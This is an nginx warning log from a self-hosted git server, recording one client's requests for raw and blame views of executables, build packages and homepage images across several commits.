2026/02/17 14:00:44 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/15/0000014159 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/GoldMonitor.pkg"
2026/02/17 14:00:58 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/16/0000014160 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe"
2026/02/17 14:01:41 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/16/0000014161 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/AssetPilot.exe"
2026/02/17 14:01:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/16/0000014162 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/GoldMonitor.exe"
2026/02/17 14:02:23 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/16/0000014163 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe"
2026/02/17 14:02:34 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/16/0000014164 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg"
2026/02/17 14:02:41 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/16/0000014165 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg"
2026/02/17 14:02:48 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000014166 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe"
2026/02/17 14:03:53 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/16/0000014167 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:04:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/16/0000014168 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html"
2026/02/17 14:04:55 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/16/0000014169 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png"
2026/02/17 14:05:02 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/17/0000014170 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png"
2026/02/17 14:05:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/17/0000014171 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png"
2026/02/17 14:05:18 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/17/0000014172 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png"
2026/02/17 14:05:20 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/17/0000014173 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png"
2026/02/17 14:05:26 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/17/0000014174 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png"
2026/02/17 14:05:32 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/17/0000014175 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png"
2026/02/17 14:05:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/17/0000014176 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html"
2026/02/17 14:05:52 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/17/0000014177 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html"
2026/02/17 14:06:01 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/17/0000014178 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom7.png"
2026/02/17 14:06:08 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/17/0000014179 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom4.png"
2026/02/17 14:06:15 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/18/0000014180 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png"
2026/02/17 14:06:22 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/18/0000014181 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png"
2026/02/17 14:06:30 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/18/0000014182 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png"
2026/02/17 14:06:37 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/18/0000014183 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png"
2026/02/17 14:06:45 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/18/0000014184 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png"
2026/02/17 14:06:48 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/18/0000014185 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png"
2026/02/17 14:07:54 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/18/0000014186 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png"
2026/02/17 14:08:01 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/18/0000014187 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom1.png"
2026/02/17 14:08:08 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/18/0000014188 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom6.png"
2026/02/17 14:08:14 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/18/0000014189 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom5.png"
2026/02/17 14:08:22 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/19/0000014190 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html"
2026/02/17 14:08:32 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/19/0000014191 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png"
2026/02/17 14:08:39 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/19/0000014192 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom4.png"
2026/02/17 14:08:42 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/19/0000014193 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png"
2026/02/17 14:11:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/19/0000014194 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe"
2026/02/17 14:11:46 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/19/0000014195 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/nos_setup.exe"
2026/02/17 14:12:16 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/19/0000014196 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/nos_setup.exe"
2026/02/17 14:12:50 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/19/0000014197 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom2.png"
2026/02/17 14:12:58 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/19/0000014198 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom6.png"
2026/02/17 14:13:04 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/19/0000014199 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom4.png"
2026/02/17 14:13:10 [warn] 918#918: *52279 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/20/0000014200 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets/images/ControlRoom5.png"
